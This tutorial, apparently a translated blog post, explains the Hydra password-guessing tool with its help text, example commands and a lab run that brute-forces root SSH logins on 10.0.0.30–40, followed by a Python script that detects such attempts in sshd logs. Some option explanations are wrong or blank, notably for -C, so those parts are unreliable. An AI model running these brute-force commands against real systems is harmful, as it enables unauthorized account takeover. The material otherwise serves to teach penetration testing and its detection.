hydra help

    hydra -h

Output:

    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]

    Options:
      -R        restore a previous aborted/crashed session
      -I        ignore an existing restore file (don't wait 10 seconds)
      -S        perform an SSL connect
      -s PORT   if the service is on a different default port, define it here
      -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
      -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
      -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
      -y        disable use of symbols in bruteforce, see above
      -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
      -u        loop around users, not passwords (effective! implied with -x)
      -C FILE   colon separated "login:pass" format, instead of -L/-P options
      -M FILE   list of servers to attack, one entry per line, ':' to specify port
      -o FILE   write found login/password pairs to FILE instead of stdout
      -b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
      -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
      -t TASKS  run TASKS number of connects in parallel per target (default: 16)
      -T TASKS  run TASKS connects in parallel overall (for -M, default: 64)
      -w / -W TIME  wait time for a response (32) / between connects per thread (0)
      -c TIME   wait time per login attempt over all threads (enforces -t 1)
      -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
      -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
      -O        use old SSL v2 and v3
      -q        do not print messages about connection errors
      -U        service module usage details
      -h        more command line options (COMPLETE HELP)
      server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
      service   the service to crack (see below for supported protocols)
      OPT       some service modules support additional input (-U for module help)

    Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s]
    http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum
    icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql
    mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2
    rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp
    socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

    Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
    v3.0. The newest version is always available at
    https://github.com/vanhauser-thc/thc-hydra
    Don't use in military or secret service organizations, or for illegal purposes.
    These services were not compiled in: afp ncp oracle sapr3.

    Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
    E.g.
    % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
    % export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
    % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
    % export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)

    Examples:

    hydra -l user -P passlist.txt ftp://192.168.0.1

Explanation:
-l  the user name to use
-P  the password file, i.e. the dictionary file

    hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
    hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5

Explanation:
-C

    hydra -l admin -p password ftp://[192.168.0.0/24]/
    hydra -L logins.txt -P pws.txt -M targets.txt ssh

Explanation:
-L  the user name file (a list of user names)
-P  the password file, i.e. the dictionary file
-M  the file listing the host IP addresses
ssh the service to crack; here the service being cracked is ssh

Explanation of the options:
-L  specifies the user name file (list of user names)
-l  specifies a single user name
-P (upper-case P)  specifies the password file (dictionary)
-C  specifies the user name file
-p (lower-case p)  specifies a single password
-M  specifies the host list file, i.e. the host IP addresses
-e nsr  null password
-o  writes the results to the specified file

Experiment 1: crack the ssh service on the 10.0.0.30-10.0.0.40 range

1. Create the password file by hand

    vim pass.txt

Enter the following content (adapt it to your own passwords):

    asdf
    asdfqwe
    qwerasd
    asdfghjkl
    zxcvbnm
    admin123
    asdf123
    admin123567890
    1234567890
    12345
    123456
    1234

2. Create the file with the host IP range

    vim hostlist.txt

    10.0.0.30
    10.0.0.31
    10.0.0.32
    10.0.0.33
    10.0.0.34
    10.0.0.35
    10.0.0.36
    10.0.0.37
    10.0.0.38
    10.0.0.39
    10.0.0.40

3. Start the brute-force run

    hydra -l root -P pass.txt -M hostlist.txt ssh

Output:

    Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

    Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-10-05 19:18:46
    [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
    [DATA] max 13 tasks per 12 servers, overall 64 tasks, 13 login tries (l:1/p:13), ~3 tries per task
    [DATA] attacking ssh://(12 targets):22/
    [ERROR] could not resolve address:
    [ERROR] could not connect to ssh://10.0.0.33:22 - No route to host
    [ERROR] could not connect to ssh://10.0.0.34:22 - No route to host
    [ERROR] could not connect to ssh://10.0.0.35:22 - No route to host
    [ERROR] could not connect to ssh://10.0.0.36:22 - No route to host
    [ERROR] could not connect to ssh://10.0.0.37:22 - No route to host
    [ERROR] could not connect to ssh://10.0.0.38:22 - No route to host
    [ERROR] could not connect to ssh://10.0.0.39:22 - No route to host
    [ERROR] could not connect to ssh://10.0.0.40:22 - No route to host
    [ERROR] could not connect to ssh://(null):22 - Hostname required
    [22][ssh] host: 10.0.0.32   login: root   password: 123456
    [22][ssh] host: 10.0.0.31   login: root   password: 123456
    [22][ssh] host: 10.0.0.30   login: root   password: 123456
    3 of 12 targets successfully completed, 3 valid passwords found
    Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-10-05 19:19:14

Here you can see that on hosts 32, 31 and 30 the password is 123456 and the user name is root.

4. Or specify a single IP address

    hydra -l root -P pass.txt 10.0.0.32 ssh
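
A run like the one in Experiment 1 leaves a recognizable trace in each target's sshd log: a burst of failed root password logins from one source, followed by an accepted password from that same source. The Python below is an added example, not part of the original post, that flags this pattern; the log lines, host names and source addresses are constructed, and the function name and threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample sshd log lines (hosts and source addresses are made up).
SAMPLE_LOG = """\
Oct  5 19:18:47 node30 sshd[2101]: Failed password for root from 10.0.0.5 port 40112 ssh2
Oct  5 19:18:47 node30 sshd[2102]: Failed password for root from 10.0.0.5 port 40114 ssh2
Oct  5 19:18:48 node30 sshd[2103]: Failed password for root from 10.0.0.5 port 40116 ssh2
Oct  5 19:18:49 node30 sshd[2104]: Accepted password for root from 10.0.0.5 port 40118 ssh2
Oct  5 19:20:02 node31 sshd[977]: Failed password for root from 10.0.0.9 port 51500 ssh2
Oct  5 19:20:09 node31 sshd[977]: Accepted password for root from 10.0.0.9 port 51500 ssh2
Oct  5 19:21:30 node32 sshd[1200]: Failed password for invalid user test from 10.0.0.5 port 40200 ssh2
"""

# Matches OpenSSH password-authentication result lines in syslog format.
LINE_RE = re.compile(
    r"^\w{3}\s+\d+ [\d:]{8} (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\S+) port \d+"
)

def find_guessed_logins(log_text, min_failures=3):
    """Return (host, user, src, failures) for each accepted password login
    preceded by at least min_failures failed attempts from the same source
    against the same host and user."""
    failures = defaultdict(int)
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        key = (m["host"], m["user"], m["src"])
        if m["result"] == "Failed":
            failures[key] += 1
            continue
        # Accepted login: alert if it ends a failure streak, then reset.
        count = failures.pop(key, 0)
        if count >= min_failures:
            alerts.append((*key, count))
    return alerts

if __name__ == "__main__":
    for host, user, src, count in find_guessed_logins(SAMPLE_LOG):
        print(f"{host}: {user} login from {src} accepted after {count} failures")
```

The single mistyped password on node31 stays below the threshold and is not reported; lowering `min_failures` trades fewer misses for more false positives.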